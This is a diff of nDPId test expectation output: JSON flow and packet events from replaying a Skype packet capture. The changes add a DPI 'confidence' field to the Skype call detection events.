 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+eZEAAEARtmzAqAEinTfrrzLdnEgAKiUSm8YCMvX5DXLyjY07d4zs9r3Rfjeqbt6RlQe5nLyOBDZmjA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+H6wAAEAReNbAqAEiQTffKzLdnEIAKjdVm8gCRata2g4WRHPEL7\/NhH8e4p0ZaFQg5mWNPjrWv1AvJA=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4T0EAAEARk9HAqAEinTc4oTLdnEwAJGHem8oC2K8VAwXZ2I4FcvndU1pGdzS9eSLWH0xc+w=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4VhMAAEARqOnAqAEib91KETLdnFYAJFy+m8wCfUg82Gg6DnsozSUd0tlDoiZPS7EFljPm7g=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -247,146 +247,146 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3kJUAAEARCA3AqAEiQTffEjLdgQkAIzBxm84CB+tg2yEaM9\/bL8TBCQEYokW3ou6uIFeA"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAABBYQoAAEAROAbAqAEinTeCmjLdnEUALTFnm9ACrELw0MyN5alTGXUohI4skjQwNKD1mI1L+u5IA2eq73xPAw=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DEcAAEARjD7AqAEiQTffLTLdnEwAJedsm9ICSKWpAVcx8I7JZ8adPdtcTNxD1Y7ygdStLzI="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyadkAAEARfcfAqAEinTg0GDLdnEEAHr+2m9QCPz6lPkIa5+HaiHK3kAac8KWOvw=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BWcAAEAR4iHAqAEinTg0LTLdnEwAIdjym9YCeMy7FyJwEm6ud1zY3LUeAZMSqKDeqQ=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4bnAAAEARKjLAqAEiQTffETLdnFYAJDJym9gCRkbR2cp0xkwlV8oyn8X0NKXbrbkoGiloQw=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
